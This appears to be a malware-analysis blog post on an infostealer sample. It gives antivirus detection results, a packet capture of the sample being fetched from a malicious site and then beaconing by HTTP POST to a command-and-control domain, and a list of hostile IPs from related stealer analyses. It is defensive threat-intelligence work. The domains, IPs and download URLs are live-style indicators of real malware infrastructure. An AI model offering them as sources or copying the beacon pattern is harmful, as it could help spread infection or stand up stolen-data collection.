| SHA256: | 408e5e7d86d222882eab6a3f5cc71ccd9c2d98c74a6b321c761b7ef6f82c88ba |
| File name: | read.php?f=0.dat.1 |
| Detection ratio: | 22 / 55 |
| Analysis date: | 2017-01-21 23:05:38 UTC ( 0 minutes ago ) |
| aspersky | HEUR:Trojan.Win32.Generic | 20170120 |
| Malwarebytes | Trojan.MalPack.VB | 20170120 |
| McAfee | PWSZbot-FHN | 20170120 |
| McAfee-GW-Edition | BehavesLike.Win32.Worm.tt | 20170120 |
| eScan | Trojan.GenericKD.4185884 | 20170120 |
| Microsoft | Trojan:Win32/Dynamer!ac | 20170120 |
| Panda | Trj/GdSda.A | 20170120 |
| Qihoo-360 | HEUR/QVM03.0.A425.Malware.Gen | 20170121 |
| Sophos | Troj/Zbot-LPS | 20170120 |
| Symantec | ML.Relationship.HighConfidence [Infostealer.Limitail] | 20170120 |
| Tencent | Win32.Trojan.Generic.Swba | 20170121 |
| TrendMicro | TSPY_INFOSTEAL.RRG | 20170121 |
| TrendMicro-HouseCall | TSPY_INFOSTEAL.RRG | 20170121 |
| VIPRE | Trojan.Win32.Generic!BT | 20170121 |
| ViRobot | Trojan.Win32.Infostealer.1854296[h] | 20170121 |
| Yandex | Trojan.Injector!fxtPd0Ocb/U | 20170120 |
2017-01-21 01:34:57.576124 IP 192.168.1.102.50646 > 84.200.34.99.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /read.php?f=0.dat HTTP/1.1
E..M3.@….U…fT.”c…Pa..F..3.P…….GET /read.php?f=0.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aloepolera.top
Connection: Keep-Alive
2017-01-21 01:35:24.493431 IP 192.168.1.102.61133 > 75.75.75.75.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG$………fKKKK…5.4
.3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:25.478850 IP 192.168.1.102.61134 > 75.75.75.75.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG%………fKKKK…5.4
.3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:26.479008 IP 192.168.1.102.61135 > 75.75.75.75.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG&………fKKKK…5.4
.3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:26.493504 IP 192.168.1.102.61133 > 75.75.76.76.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..H0……h…fKKLL…5.4 .3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:26.782549 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [S], seq 4173774261, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.D@……..f6.’….P………. ……………..
2017-01-21 01:35:26.811246 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [.], ack 3223055681, win 256, length 0
E..(.E@……..f6.’….P…….AP…e………
2017-01-21 01:35:26.812435 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [P.], seq 0:93, ack 1, win 256, length 93: HTTP: POST / HTTP/1.1
E….F@….v…f6.’….P…….AP…2…POST / HTTP/1.1
Host: mbfce24rgn65bx3g.er29sl.in
Content-Length: 167
Connection: close
2017-01-21 01:35:27.478619 IP 192.168.1.102.61134 > 75.75.76.76.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..H0……g…fKKLL…5.4 .3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:27.946618 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [.], ack 112, win 256, length 0
E..(.H@……..f6.’….P……..P…c………
2017-01-21 01:35:27.947809 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [F.], seq 260, ack 112, win 256, length 0
E..(.I@……..f6.’….P……..P…c………
2017-01-21 01:35:28.478763 IP 192.168.1.102.61135 > 75.75.76.76.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..H0……f…fKKLL…5.4 .3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:28.776237 IP 192.168.1.102.50646 > 84.200.34.99.80: Flags [F.], seq 293, ack 274776, win 1180, length 0
E..(3.@……..fT.”c…Pa..k..dbP… 8……..
2017-01-21 01:35:29.478828 IP 192.168.1.102.61134 > 75.75.75.75.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG*………fKKKK…5.4
.3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:31.479076 IP 192.168.1.102.61134 > 75.75.76.76.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..H0……d…fKKLL…5.4 .3…………mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:32.245715 IP 192.168.1.102.61136 > 75.75.75.75.53: 60353+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG,………fKKKK…5.4Q…………..mbfce24rgn65bx3g.er29sl.in…..
2017-01-21 01:35:32.265343 IP 192.168.1.102.50648 > 66.23.246.239.80: Flags [S], seq 1829708398, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4x.@……..fB……Pm.”n…… ..T…………..
2017-01-21 01:35:32.316926 IP 192.168.1.102.50648 > 66.23.246.239.80: Flags [.], ack 1944042060, win 256, length 0
E..(x.@…. …fB……Pm.”os..LP…/………
2017-01-21 01:35:32.317860 IP 192.168.1.102.50648 > 66.23.246.239.80: Flags [P.], seq 0:93, ack 1, win 256, length 93: HTTP: POST / HTTP/1.1
E…x.@……..fB……Pm.”os..LP…….POST / HTTP/1.1
Host: mbfce24rgn65bx3g.er29sl.in
Content-Length: 167
Connection: close
Written By
2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1 E....=@...wX . ...u-.N.P'&"i....P.@).Q..GET /zxcv.EXE HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozill...
AZORult/RacoonStealer can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. Raccoon is an info...
Predator the Thief is an information stealer, meaning that it is a malware that steals data from infected systems. This virus can access the camera and spy on victims, steal passwords and login information as well as retrieve payment data from cryptocurrency wallet...
Hostile IPs: 172.217.164.131 172.217.9.206 172.253.63.132 188.127.249.210 195.201.225.248 217.8.117.45 34.107.4.68 91.193.75.172 96.6.6.64 Dynamic Analysis Report Classification:DownloaderSpyware Threat Names:AZORult v3Gen:Varian...
